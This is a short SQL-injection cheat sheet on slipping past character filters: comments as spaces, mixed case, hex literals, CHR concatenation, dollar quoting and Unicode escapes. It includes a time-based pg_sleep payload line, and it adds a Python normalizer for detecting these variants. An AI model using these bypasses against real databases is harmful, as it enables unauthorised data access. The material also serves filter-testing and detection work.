Bypassing Character Restrictions

General

Space -> Comment

SELECT id, user, password FROM users WHERE id = '1';
SELECT/**/id,/**/user,/**/password/**/FROM/**/users/**/WHERE/**/id/**/=/**/'1';

Upper and Lower case

SELECT id, user, password FROM users WHERE id = '1';
SeLeCT id, user, password frOM users WHeRe id = '1';

MySQL

Hexadecimal

SELECT 0x6a6f726765637466 #SELECT 'jorgectf'

PostgreSQL

ASCII concatenation

# Python: build the CHR() concatenation for a given string
print('||'.join("CHR("+str(ord(i))+")" for i in "jorgectf"))
SELECT CHR(106)||CHR(111)||CHR(114)||CHR(103)||CHR(101)||CHR(99)||CHR(116)||CHR(102) -- SELECT 'jorgectf'

Single Quote Bypass using $$

$$jorgectf$$ -- 'jorgectf'
> AND $$jorgectf$$ = 'jorgectf' AND (SELECT 1 FROM pg_sleep(10))=1
0:00:10.491213

Unicode

SELECT U&"\006a\006f\0072\0067\0065\0063\0074\0066" -- SELECT jorgectf (identifier)
SELECT U&'\006a\006f\0072\0067\0065\0063\0074\0066' -- SELECT 'jorgectf' (string)
U&"\006a\006f\0072\0067\0065\0063\0074\0066"() -- jorgectf() (a function name is an identifier, so it takes double quotes)
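
Detection side of the variants above, as an added example that is not part of the original page: a normalizer that reduces each listed encoding to one canonical form before an input filter or log signature is matched. The function names are assumptions of this example, and it works on regexes only, so it does not track string context the way a real SQL lexer would.

```python
import re

def _chr_concat(m):
    # PostgreSQL CHR(106)||CHR(111)||... -> 'jo...'
    return "'" + "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(0))) + "'"

def _hex_literal(m):
    # MySQL 0x6a6f... -> 'jo...'; left untouched if the bytes are not UTF-8 text
    try:
        return "'" + bytes.fromhex(m.group(1)).decode("utf-8") + "'"
    except UnicodeDecodeError:
        return m.group(0)

def _unicode_literal(m):
    # PostgreSQL U&'\006a...' / U&"\006a...": decode escapes, keep the quote type
    body = re.sub(r"\\([0-9a-fA-F]{4})", lambda e: chr(int(e.group(1), 16)), m.group(2))
    return m.group(1) + body + m.group(1)

def normalize(sql):
    """Reduce a SQL fragment to one canonical form for signature matching."""
    s = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)        # comment used as a space
    s = re.sub(r"(?i)U&(['\"])(.*?)\1", _unicode_literal, s)
    s = re.sub(r"(?i)CHR\(\s*\d{1,6}\s*\)(?:\s*\|\|\s*CHR\(\s*\d{1,6}\s*\))*",
               _chr_concat, s)
    s = re.sub(r"(?i)\b0x((?:[0-9a-f]{2})+)\b", _hex_literal, s)
    s = re.sub(r"\$\$(.*?)\$\$", r"'\1'", s, flags=re.S)   # dollar quoting
    return re.sub(r"\s+", " ", s).strip().lower()          # spacing and case

# Constructed sample input: the string-literal variants listed on this page.
LITERAL_VARIANTS = [
    "SELECT 'jorgectf'",
    "SELECT 0x6a6f726765637466",
    "SELECT CHR(106)||CHR(111)||CHR(114)||CHR(103)||CHR(101)||CHR(99)||CHR(116)||CHR(102)",
    "SELECT $$jorgectf$$",
    r"SELECT U&'\006a\006f\0072\0067\0065\0063\0074\0066'",
    "sElEcT/**/'jorgectf'",
]

def canonical_forms(fragments):
    # A set with one element means every variant hits the same signature.
    return {normalize(f) for f in fragments}

if __name__ == "__main__":
    print(canonical_forms(LITERAL_VARIANTS))
```

Matching on the normalized form catches known encodings only; binding user input as query parameters removes the dependence on character filtering altogether.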
